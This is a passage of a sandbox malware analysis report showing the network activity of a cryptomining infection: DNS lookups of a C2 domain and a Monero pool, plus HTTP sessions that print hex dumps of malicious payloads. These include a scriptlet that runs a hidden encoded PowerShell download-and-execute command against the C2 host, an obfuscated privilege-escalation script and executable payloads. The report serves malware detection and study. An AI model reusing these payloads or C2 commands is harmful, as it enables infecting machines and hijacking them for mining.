05:06:46.523380995 CEST 53 65490 8.8.8.8 192.168.2.2 Sep 4, 2018 05:07:40.489527941 CEST 60652 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:07:40.526570082 CEST 53 60652 8.8.8.8 192.168.2.2 Sep 4, 2018 05:08:03.969499111 CEST 57729 53 192.168.2.2 8.8.8.8 Sep 4, 2018 05:08:04.002902985 CEST 53 57729 8.8.8.8 192.168.2.2

Copyright Joe Security LLC 2018 Page 25 of 50 ICMP Packets

Timestamp Source IP Dest IP Checksum Code Type Sep 4, 2018 05:06:04.043476105 CEST 192.168.2.2 185.128.43.62 4d5a Echo Sep 4, 2018 05:06:04.057115078 CEST 185.128.43.62 192.168.2.2 555a Echo Reply Sep 4, 2018 05:06:04.111731052 CEST 192.168.2.2 185.128.43.62 4d59 Echo Sep 4, 2018 05:06:04.124952078 CEST 185.128.43.62 192.168.2.2 5559 Echo Reply Sep 4, 2018 05:06:04.182408094 CEST 192.168.2.2 185.128.43.62 4d58 Echo Sep 4, 2018 05:06:04.195564985 CEST 185.128.43.62 192.168.2.2 5558 Echo Reply Sep 4, 2018 05:06:04.217597961 CEST 192.168.2.2 185.128.43.62 4d57 Echo Sep 4, 2018 05:06:04.231029987 CEST 185.128.43.62 192.168.2.2 5557 Echo Reply Sep 4, 2018 05:06:36.249886036 CEST 192.168.2.2 185.128.43.62 4d56 Echo Sep 4, 2018 05:06:36.263454914 CEST 185.128.43.62 192.168.2.2 5556 Echo Reply Sep 4, 2018 05:06:36.295222044 CEST 192.168.2.2 185.128.43.62 4d55 Echo Sep 4, 2018 05:06:36.308455944 CEST 185.128.43.62 192.168.2.2 5555 Echo Reply Sep 4, 2018 05:06:36.350634098 CEST 192.168.2.2 185.128.43.62 4d54 Echo Sep 4, 2018 05:06:36.363841057 CEST 185.128.43.62 192.168.2.2 5554 Echo Reply Sep 4, 2018 05:06:36.404536009 CEST 192.168.2.2 185.128.43.62 4d53 Echo Sep 4, 2018 05:06:36.417956114 CEST 185.128.43.62 192.168.2.2 5553 Echo Reply

DNS Queries

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Sep 4, 2018 05:06:04.007205009 CEST 192.168.2.2 8.8.8.8 0xaa04 Standard query update.7h4 A (IP address) IN (0x0001) (0) uk.com Sep 4, 2018 05:06:04.068552971 CEST 192.168.2.2 8.8.8.8 0x1b55 Standard query update.7h4 A (IP address) IN (0x0001) (0) uk.com Sep 4, 2018 05:06:04.134479046 CEST 192.168.2.2 8.8.8.8 0xb21f Standard query update.7h4 A (IP address) IN (0x0001) (0) uk.com Sep 4, 2018 05:06:04.203902006 CEST 192.168.2.2 8.8.8.8 0xcb4f Standard query update.7h4 A (IP address) IN (0x0001) (0) uk.com Sep 4, 2018 05:06:36.210169077 CEST 192.168.2.2 8.8.8.8 0x89ac Standard query update.7h4 A (IP address) IN (0x0001) (0) uk.com Sep 4, 2018 05:06:36.280410051 CEST 192.168.2.2 8.8.8.8 0xd08d Standard query update.7h4 A (IP address) IN (0x0001) (0) uk.com Sep 4, 2018 05:06:36.322196960 CEST 192.168.2.2 8.8.8.8 0x4d12 Standard query update.7h4 A (IP address) IN (0x0001) (0) uk.com Sep 4, 2018 05:06:36.375962973 CEST 192.168.2.2 8.8.8.8 0x2fa3 Standard query update.7h4 A (IP address) IN (0x0001) (0) uk.com Sep 4, 2018 05:06:36.936928034 CEST 192.168.2.2 8.8.8.8 0xc76f Standard query update.7h4 A (IP address) IN (0x0001) (0) uk.com Sep 4, 2018 05:06:45.052798033 CEST 192.168.2.2 8.8.8.8 0x47c Standard query update.7h4 A (IP address) IN (0x0001) (0) uk.com Sep 4, 2018 05:06:46.495673895 CEST 192.168.2.2 8.8.8.8 0x781a Standard query update.7h4 A (IP address) IN (0x0001) (0) uk.com Sep 4, 2018 05:07:40.489527941 CEST 192.168.2.2 8.8.8.8 0xf6c4 Standard query f4keu.7h4uk.com A (IP address) IN (0x0001) (0) Sep 4, 2018 05:08:03.969499111 CEST 192.168.2.2 8.8.8.8 0x6312 Standard query xmr-eu1.na A (IP address) IN (0x0001) (0) nopool.org

DNS Answers

Timestamp Source IP Dest IP Trans ID Replay Code Name CName Address Type Class Sep 4, 2018 8.8.8.8 192.168.2.2 0xaa04 No error (0) update.7h4 185.128.43.62 A (IP address) IN (0x0001) 05:06:04.035728931 uk.com CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x1b55 No error (0) update.7h4 185.128.43.62 A (IP address) IN (0x0001) 05:06:04.110846043 uk.com CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0xb21f No error (0) update.7h4 185.128.43.62 A (IP address) IN (0x0001) 05:06:04.181596041 uk.com CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0xcb4f No error (0) update.7h4 185.128.43.62 A (IP address) IN (0x0001) 05:06:04.216890097 uk.com CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x89ac No error (0) update.7h4 185.128.43.62 A (IP address) IN (0x0001) 05:06:36.247931004 uk.com CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0xd08d No error (0) update.7h4 185.128.43.62 A (IP address) IN (0x0001) 05:06:36.293931961 uk.com CEST

Copyright Joe Security LLC 2018 Page 26 of 50 Timestamp Source IP Dest IP Trans ID Replay Code Name CName Address Type Class Sep 4, 2018 8.8.8.8 192.168.2.2 0x4d12 No error (0) update.7h4 185.128.43.62 A (IP address) IN (0x0001) 05:06:36.349576950 uk.com CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x2fa3 No error (0) update.7h4 185.128.43.62 A (IP address) IN (0x0001) 05:06:36.403438091 uk.com CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0xc76f No error (0) update.7h4 185.128.43.62 A (IP address) IN (0x0001) 05:06:36.950007915 uk.com CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x47c No error (0) update.7h4 185.128.43.62 A (IP address) IN (0x0001) 05:06:45.065839052 uk.com CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x781a No error (0) update.7h4 185.128.43.62 A (IP address) IN (0x0001) 05:06:46.523380995 uk.com CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0xf6c4 No error (0) f4keu.7h4uk.com 185.128.43.58 A (IP address) IN (0x0001) 05:07:40.526570082 CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x6312 No error (0) xmr-eu1.na 51.15.58.224 A (IP address) IN (0x0001) 05:08:04.002902985 nopool.org CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x6312 No error (0) xmr-eu1.na 198.251.88.21 A (IP address) IN (0x0001) 05:08:04.002902985 nopool.org CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x6312 No error (0) xmr-eu1.na 217.182.169.148 A (IP address) IN (0x0001) 05:08:04.002902985 nopool.org CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x6312 No error (0) xmr-eu1.na 51.15.65.182 A (IP address) IN (0x0001) 05:08:04.002902985 nopool.org CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x6312 No error (0) xmr-eu1.na 51.15.78.68 A (IP address) IN (0x0001) 05:08:04.002902985 nopool.org CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x6312 No error (0) xmr-eu1.na 51.255.34.118 A (IP address) IN (0x0001) 05:08:04.002902985 nopool.org CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x6312 No error (0) xmr-eu1.na 213.32.29.143 A (IP address) IN (0x0001) 05:08:04.002902985 nopool.org CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x6312 No error (0) xmr-eu1.na 5.196.23.240 A (IP address) IN (0x0001) 05:08:04.002902985 nopool.org CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x6312 No error (0) xmr-eu1.na 5.196.13.29 A (IP address) IN (0x0001) 05:08:04.002902985 nopool.org CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x6312 No error (0) xmr-eu1.na 151.80.144.253 A (IP address) IN (0x0001) 05:08:04.002902985 nopool.org CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x6312 No error (0) xmr-eu1.na 92.222.180.119 A (IP address) IN (0x0001) 05:08:04.002902985 nopool.org CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x6312 No error (0) xmr-eu1.na 164.132.109.110 A (IP address) IN (0x0001) 05:08:04.002902985 nopool.org CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x6312 No error (0) xmr-eu1.na 51.15.54.102 A (IP address) IN (0x0001) 05:08:04.002902985 nopool.org CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x6312 No error (0) xmr-eu1.na 79.137.82.5 A (IP address) IN (0x0001) 05:08:04.002902985 nopool.org CEST Sep 4, 2018 8.8.8.8 192.168.2.2 0x6312 No error (0) xmr-eu1.na 51.15.69.136 A (IP address) IN (0x0001) 05:08:04.002902985 nopool.org CEST

HTTP Request Dependency Graph

update.7h4uk.com:443 185.128.43.62

HTTP Packets

Session ID Source IP Source Port Destination IP Destination Port Process 0 192.168.2.2 49161 185.128.43.62 443 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Copyright Joe Security LLC 2018 Page 27 of 50 kBytes Timestamp transferred Direction Data Sep 4, 2018 2 OUT GET /ver.txt HTTP/1.1 05:06:36.987550020 CEST Host: update.7h4uk.com:443 Connection: Keep-Alive Sep 4, 2018 3 IN HTTP/1.1 200 OK 05:06:37.001055956 CEST Date: Tue, 04 Sep 2018 02:45:58 GMT Server: Apache/2.2.15 (CentOS) Last-Modified: Fri, 20 Jul 2018 13:16:46 GMT ETag: "a02bb-4-5716e1b946601" Accept-Ranges: bytes Content-Length: 4 Content-type: application/octet-stream Content-Disposition: attachment Connection: close Data Raw: 31 2e 38 0a Data Ascii: 1.8

Session ID Source IP Source Port Destination IP Destination Port Process 1 192.168.2.2 49162 185.128.43.62 443 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

kBytes Timestamp transferred Direction Data Sep 4, 2018 4 OUT GET /antivirus.php HTTP/1.1 05:06:45.093209028 CEST Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: update.7h4uk.com:443 Connection: Keep-Alive Sep 4, 2018 5 IN HTTP/1.1 200 OK 05:06:45.106734991 CEST Date: Tue, 04 Sep 2018 02:46:07 GMT Server: Apache/2.2.15 (CentOS) Last-Modified: Thu, 07 Jun 2018 05:41:10 GMT ETag: "a0121-27b-56e06bb03c980" Accept-Ranges: bytes Content-Length: 635 Content-type: application/octet-stream Content-Disposition: attachment Connection: close Data Raw: 3c 3f 58 4d 4c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 0d 0a 3c 73 63 72 69 70 74 6c 65 74 3e 0d 0a 3c 72 65 67 69 73 74 72 61 74 69 6f 6e 0d 0a 20 20 20 20 70 72 6f 67 69 64 3d 22 54 65 73 74 22 0d 0a 20 20 20 20 63 6c 61 73 73 69 64 3d 22 7b 31 30 30 30 31 31 31 31 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 46 45 45 44 41 43 44 43 7d 22 20 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 65 61 72 6e 20 66 72 6f 6d 20 43 61 73 65 79 20 53 6d 69 74 68 20 40 73 75 62 54 65 65 20 2d 2d 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 5b 43 44 41 54 41 5b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 73 20 20 3d 20 22 63 6d 64 2e 65 78 65 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 20 2d 6e 6f 70 20 2d 6e 6f 6e 69 20 2d 77 20 68 69 64 64 65 6e 20 2d 65 6e 63 20 53 51 42 46 41 46 67 41 49 41 41 6f 41 43 67 41 62 67 42 6c 41 48 63 41 4c 51 42 76 41 47 49 41 61 67 42 6c 41 47 4d 41 64 41 41 67 41 47 34 41 5a 51 42 30 41 43 34 41 64 77 42 6c 41 47 49 41 59 77 42 73 41 47 6b 41 5a 51 42 75 41 48 51 41 4b 51 41 75 41 47 51 41 62 77 42 33 41 47 34 41 62 41 42 76 41 47 45 41 5a 41 42 7a 41 48 51 41 63 67 42 70 41 47 34 41 5a 77 41 6f 41 43 63 41 61 41 42 30 41 48 51 41 63 41 41 36 41 43 38 41 4c 77 41 78 41 44 67 41 4e 51 41 75 41 44 45 41 4d 67 41 34 41 43 34 41 4e 41 41 7a 41 43 34 41 4e 67 41 79 41 43 38 41 5a 51 42 76 41 48 41 41 4c 67 42 77 41 48 4d 41 4d 51 41 6e 41 43 6b 41 4b 51 41 4b 41 41 3d 3d 22 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 2e 52 75 6e 28 70 73 2c 30 2c 74 72 75 65 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 5d 5d 3e 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 72 65 67 69 73 74 72 61 74 69 6f 6e 3e 0d 0a 3c 2f 73 63 72 69 70 74 6c 65 74 3e 0d 0a Data Ascii: ... Learn from Casey Smith @subTee -->

Session ID Source IP Source Port Destination IP Destination Port Process 2 192.168.2.2 49163 185.128.43.62 443 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

kBytes Timestamp transferred Direction Data Sep 4, 2018 5 OUT GET /logos.png HTTP/1.1 05:06:45.311439037 CEST Host: update.7h4uk.com:443

Copyright Joe Security LLC 2018 Page 28 of 50 kBytes Timestamp transferred Direction Data Sep 4, 2018 6 IN HTTP/1.1 200 OK 05:06:45.325161934 CEST Date: Tue, 04 Sep 2018 02:46:07 GMT Server: Apache/2.2.15 (CentOS) Last-Modified: Tue, 29 May 2018 14:37:39 GMT ETag: "a0145-114c1-56d592d0e92c0" Accept-Ranges: bytes Content-Length: 70849 Content-type: application/octet-stream Content-Disposition: attachment Connection: close Data Raw: 37 37 20 39 30 20 31 34 34 20 30 20 33 20 30 20 30 20 30 20 34 20 30 20 30 20 30 20 32 35 35 20 32 35 35 20 30 20 30 20 31 38 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 36 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 32 31 36 20 30 20 30 20 30 20 31 34 20 33 31 20 31 38 36 20 31 34 20 30 20 31 38 30 20 39 20 32 30 35 20 33 33 20 31 38 34 20 31 20 37 36 20 32 30 35 20 33 33 20 38 34 20 31 30 34 20 31 30 35 20 31 31 35 20 33 32 20 31 31 32 20 31 31 34 20 31 31 31 20 31 30 33 20 31 31 34 20 39 37 20 31 30 39 20 33 32 20 39 39 20 39 37 20 31 31 30 20 31 31 30 20 31 31 31 20 31 31 36 20 33 32 20 39 38 20 31 30 31 20 33 32 20 31 31 34 20 31 31 37 20 31 31 30 20 33 32 20 31 30 35 20 31 31 30 20 33 32 20 36 38 20 37 39 20 38 33 20 33 32 20 31 30 39 20 31 31 31 20 31 30 30 20 31 30 31 20 34 36 20 31 33 20 31 33 20 31 30 20 33 36 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 36 34 20 32 35 32 20 31 34 39 20 32 30 37 20 34 20 31 35 37 20 32 35 31 20 31 35 36 20 34 20 31 35 37 20 32 35 31 20 31 35 36 20 34 20 31 35 37 20 32 35 31 20 31 35 36 20 35 30 20 31 38 37 20 32 34 31 20 31 35 36 20 35 20 31 35 37 20 32 35 31 20 31 35 36 20 31 30 37 20 31 33 30 20 32 34 31 20 31 35 36 20 31 35 20 31 35 37 20 32 35 31 20 31 35 36 20 31 33 35 20 31 32 39 20 32 34 35 20 31 35 36 20 30 20 31 35 37 20 32 35 31 20 31 35 36 20 31 30 37 20 31 33 30 20 32 35 35 20 31 35 36 20 36 20 31 35 37 20 32 35 31 20 31 35 36 20 31 39 39 20 31 34 36 20 31 36 36 20 31 35 36 20 39 20 31 35 37 20 32 35 31 20 31 35 36 20 34 20 31 35 37 20 32 35 30 20 31 35 36 20 37 33 20 31 35 37 20 32 35 31 20 31 35 36 20 32 33 36 20 31 33 30 20 32 34 30 20 31 35 36 20 30 20 31 35 37 20 32 35 31 20 31 35 36 20 38 32 20 31 30 35 20 39 39 20 31 30 34 20 34 20 31 35 37 20 32 35 31 20 31 35 36 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 38 30 20 36 39 20 30 20 30 20 37 36 20 31 20 31 20 30 20 36 38 20 31 30 31 20 31 33 20 39 31 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 32 32 34 20 30 20 31 35 20 31 20 31 31 20 31 20 36 20 30 20 30 20 30 20 30 20 30 20 30 20 38 36 20 30 20 30 20 30 20 30 20 30 20 30 20 39 35 20 35 32 20 30 20 30 20 30 20 31 36 20 30 20 30 20 30 20 31 36 20 30 20 30 20 30 20 30 20 36 34 20 30 20 30 20 31 36 20 30 20 30 20 30 20 32 20 30 20 30 20 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 34 20 30 20 Data Ascii: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 216 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 64 252 149 207 4 157 251 156 4 157 251 156 4 157 251 156 50 187 241 156 5 157 251 156 107 130 241 156 15 157 251 156 135 129 245 156 0 157 251 156 107 130 255 156 6 157 251 156 199 146 166 156 9 157 251 156 4 157 250 156 73 157 251 156 236 130 240 156 0 157 251 156 82 105 99 104 4 157 251 156 0 0 0 0 0 0 0 0 80 69 0 0 76 1 1 0 68 101 13 91 0 0 0 0 0 0 0 0 224 0 15 1 11 1 6 0 0 0 0 0 0 86 0 0 0 0 0 0 95 52 0 0 0 16 0 0 0 16 0 0 0 0 64 0 0 16 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0

Session ID Source IP Source Port Destination IP Destination Port Process 3 192.168.2.2 49164 185.128.43.62 443 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

kBytes Timestamp transferred Direction Data Sep 4, 2018 80 OUT GET /antivirus.php HTTP/1.1 05:06:46.547508001 CEST Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: update.7h4uk.com:443 Connection: Keep-Alive

Copyright Joe Security LLC 2018 Page 29 of 50 kBytes Timestamp transferred Direction Data Sep 4, 2018 81 IN HTTP/1.1 200 OK 05:06:46.561300993 CEST Date: Tue, 04 Sep 2018 02:46:08 GMT Server: Apache/2.2.15 (CentOS) Last-Modified: Thu, 07 Jun 2018 05:41:10 GMT ETag: "a0121-27b-56e06bb03c980" Accept-Ranges: bytes Content-Length: 635 Content-type: application/octet-stream Content-Disposition: attachment Connection: close Data Raw: 3c 3f 58 4d 4c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 0d 0a 3c 73 63 72 69 70 74 6c 65 74 3e 0d 0a 3c 72 65 67 69 73 74 72 61 74 69 6f 6e 0d 0a 20 20 20 20 70 72 6f 67 69 64 3d 22 54 65 73 74 22 0d 0a 20 20 20 20 63 6c 61 73 73 69 64 3d 22 7b 31 30 30 30 31 31 31 31 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 46 45 45 44 41 43 44 43 7d 22 20 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 65 61 72 6e 20 66 72 6f 6d 20 43 61 73 65 79 20 53 6d 69 74 68 20 40 73 75 62 54 65 65 20 2d 2d 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 5b 43 44 41 54 41 5b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 73 20 20 3d 20 22 63 6d 64 2e 65 78 65 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 20 2d 6e 6f 70 20 2d 6e 6f 6e 69 20 2d 77 20 68 69 64 64 65 6e 20 2d 65 6e 63 20 53 51 42 46 41 46 67 41 49 41 41 6f 41 43 67 41 62 67 42 6c 41 48 63 41 4c 51 42 76 41 47 49 41 61 67 42 6c 41 47 4d 41 64 41 41 67 41 47 34 41 5a 51 42 30 41 43 34 41 64 77 42 6c 41 47 49 41 59 77 42 73 41 47 6b 41 5a 51 42 75 41 48 51 41 4b 51 41 75 41 47 51 41 62 77 42 33 41 47 34 41 62 41 42 76 41 47 45 41 5a 41 42 7a 41 48 51 41 63 67 42 70 41 47 34 41 5a 77 41 6f 41 43 63 41 61 41 42 30 41 48 51 41 63 41 41 36 41 43 38 41 4c 77 41 78 41 44 67 41 4e 51 41 75 41 44 45 41 4d 67 41 34 41 43 34 41 4e 41 41 7a 41 43 34 41 4e 67 41 79 41 43 38 41 5a 51 42 76 41 48 41 41 4c 67 42 77 41 48 4d 41 4d 51 41 6e 41 43 6b 41 4b 51 41 4b 41 41 3d 3d 22 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 2e 52 75 6e 28 70 73 2c 30 2c 74 72 75 65 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 5d 5d 3e 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 72 65 67 69 73 74 72 61 74 69 6f 6e 3e 0d 0a 3c 2f 73 63 72 69 70 74 6c 65 74 3e 0d 0a Data Ascii: ... Learn from Casey Smith @subTee -->

Session ID Source IP Source Port Destination IP Destination Port Process 4 192.168.2.2 49165 185.128.43.62 80 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

kBytes Timestamp transferred Direction Data Sep 4, 2018 82 OUT GET /eop.ps1 HTTP/1.1 05:06:48.810359001 CEST Host: 185.128.43.62 Connection: Keep-Alive Sep 4, 2018 83 IN HTTP/1.1 200 OK 05:06:48.824304104 CEST Date: Tue, 04 Sep 2018 02:46:10 GMT Server: Apache/2.2.15 (CentOS) Last-Modified: Wed, 11 Jul 2018 08:12:19 GMT ETag: "a0138-3f1b-570b4ce2c7ec0" Accept-Ranges: bytes Content-Length: 16155 Content-type: application/octet-stream Content-Disposition: attachment Connection: close Data Raw: 26 28 20 24 70 73 48 4f 6d 65 5b 34 5d 2b 24 70 73 68 4f 6d 65 5b 33 34 5d 2b 27 78 27 29 28 20 22 20 24 28 20 73 65 74 20 20 27 4f 66 53 27 20 27 27 20 29 20 22 2b 5b 73 54 72 49 6e 47 5d 28 28 36 36 2c 20 37 35 2c 27 36 65 27 20 2c 36 33 2c 37 34 2c 36 39 2c 27 36 66 27 2c 20 27 36 65 27 20 2c 20 32 30 2c 20 35 34 2c 36 35 20 2c 37 33 20 2c 20 37 34 20 2c 27 32 64 27 2c 35 37 20 2c 20 27 36 66 27 20 2c 20 37 37 20 2c 20 33 36 20 2c 33 34 20 2c 32 38 20 2 c 20 32 39 20 2c 32 30 2c 27 37 62 27 2c 27 64 27 20 2c 20 27 61 27 20 2c 20 32 30 2c 32 30 2c 32 30 20 2c 32 30 20 2c 20 37 32 20 2c 36 35 2c 37 34 2c 37 35 20 2c 20 37 32 2c 20 27 36 65 27 2c 20 32 30 20 2c 32 38 20 2c 35 34 2c 36 35 20 2c 20 37 33 20 2c 20 37 34 20 2c 27 32 64 27 2c 35 37 2c 20 36 39 20 2c 20 27 36 65 27 2c 20 33 33 20 2c 20 33 32 20 2c 32 39 2c 32 30 2c 27 32 64 27 20 2c 20 36 31 20 2c 27 36 65 27 20 2c 20 36 34 20 2c 20 32 30 2c 20 32 38 2c 20 37 34 2c 20 36 35 2c 20 37 33 20 2c 20 37 34 20 2c 20 27 32 64 27 20 2c 37 30 20 2c 20 36 31 2c 20 37 34 2c 20 36 38 20 2c 32 30 20 2c 20 36 35 20 2c 20 27 36 65 27 20 2c 37 36 20 2c 20 27 33 61 27 2c 27 35 63 27 20 2c 20 35 30 20 2c 20 35 32 20 2c 27 34 66 27 2c 20 34 33 20 2c 20 34 35 2c 20 35 33 2c 35 33 2c 20 27 34 66 27 20 2c 35 32 2c 27 35 66 27 2c 20 34 31 20 2c 35 32 20 2c 34 33 2c 34 38 20 2c 34 39 20 2c 35 34 20 2c 34 35 2c 20 35 37 2c 33 36 20 2c 33 34 20 2c 33 33 2c 20 33 32 20 2c 20 32 39 2c 27 64 27 20 2c 27 61 27 20 2c 27 37 64 27 20 2c 20 27 64 27 2c 27 61 27 20 2c 36 36 20 2c 37 35 2c 27 36 65 27 20 2c 20 36 33 20 2c 37 34 20 2c 36 39 2c 20 27 36 66 27 2c 20 27 36 65 27 2c 32 30 2c 20 35 34 2c 36 35 20 2c 37 33 2c 37 34 2c 27 32 64 27 20 2c 35 37 20 2c 36 39 20 2c 20 27 36 65 27 2c 20 33 33 2 c 20 33 32 2c 32 38 20 2c 32 39 2c 32 30 2c 20 27 37 62 27 2c 27 64 27 20 2c 27 61 27 20 2c 32 30 2c 32 30 2c 32 30 20 2c 32 30 2c 20 37 32 20 2c 36 35 20 2c 37 34 2c 37 35 20 2c 37 32 20 2c 20 27 36 65 27 20 2c 20 32 30 20 2c 27 35 62 27 20 2c 20 34 39 2c 20 27 36 65 27 20 2c 20 37 34 2c 20 35 30 2c 20 37 34 20 2c 37 32 2c 20 27 35 64 27 2c 20 27 33 61 27 20 2c 27 33 61 27 2c 20 37 33 20 2c 36 39 2c 27 37 61 27 20 2c 36 35 20 2c 32 30 20 2c 27 32 64 27 2c 36 35 2c 20 37 31 20 2c 32 30 2c 20 33 34 20 2c 27 64 27 2c 27 61 27 2c 20 27 37 64 27 20 2c 27 64 27 20 2c 20 27 61 27 2c 20 36 39 20 2c 20 36 36 2c 20 32 30 2c 32 38 20 2c 35 34 20 2c 20 36 35 2c 20 37 33 20 2c 20 37 34 20 2c 20 27 32 64 27 2c 35 37 2c 20 27 36 66 27 20 2c Data Ascii: &( $psHOme[4]+$pshOme[34]+'x')( " $( set 'OfS' '' ) "+[sTrInG]((66, 75,'6e' ,63,74,69,'6f', '6e' , 20, 54,65 ,73 , 74 ,'2d',57 , '6f' , 77 , 36 ,34 ,28 , 29 ,20,'7b','d' , 'a' , 20,20,20 ,20 , 72 ,65,74,75 , 72, '6e', 20 ,28 ,54,65 , 73 , 74 ,'2d',57, 69 , '6e', 33 , 32 ,29,20,'2d' , 61 ,'6e' , 64 , 20, 28, 74, 65, 73 , 74 , '2d' ,70 , 61, 74, 68 ,20 , 65 , '6e' ,76 , '3a','5c' , 50 , 52 ,'4f', 43 , 45, 53,53, '4f' ,52,'5f', 41 ,52 ,43,48 ,49 ,54 ,45, 57,36 ,34 ,33, 32 , 29,'d' ,'a' ,'7d' , 'd','a' ,66 ,75,'6e' , 63 ,74 ,69, '6f', '6e',20, 54,65 ,73,74,'2d' ,57 ,69 , '6e', 33, 32,28 ,29,20, '7b','d' ,'a' ,20,20,20 ,20, 72 ,65 ,74,75 ,72 , '6e' , 20 ,'5b' , 49, '6e' , 74, 50, 74 ,72, '5d', '3a' ,'3a', 73 ,69,'7a' ,65 ,20 ,'2d',65, 71 ,20, 34 ,'d','a', '7d' ,'d' , 'a', 69 , 66, 20,28 ,54 , 65, 73 , 74 , '2d',57, '6f' ,

Copyright Joe Security LLC 2018 Page 30 of 50 Session ID Source IP Source Port Destination IP Destination Port Process 5 192.168.2.2 49166 185.128.43.62 443 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

kBytes Timestamp transferred Direction Data Sep 4, 2018 100 OUT GET /cohernece.txt HTTP/1.1 05:06:50.427557945 CEST Host: update.7h4uk.com:443 Sep 4, 2018 101 IN HTTP/1.1 200 OK 05:06:50.441154003 CEST Date: Tue, 04 Sep 2018 02:46:12 GMT Server: Apache/2.2.15 (CentOS) Last-Modified: Tue, 29 May 2018 09:50:14 GMT ETag: "a013a-6089a2-56d55292cc180" Accept-Ranges: bytes Content-Length: 6326690 Content-type: application/octet-stream Content-Disposition: attachment Connection: close Data Raw: 37 37 20 39 30 20 38 30 20 30 20 32 20 30 20 30 20 30 20 34 20 30 20 31 35 20 30 20 32 35 35 20 32 35 35 20 30 20 30 20 31 38 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 36 34 20 30 20 32 36 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 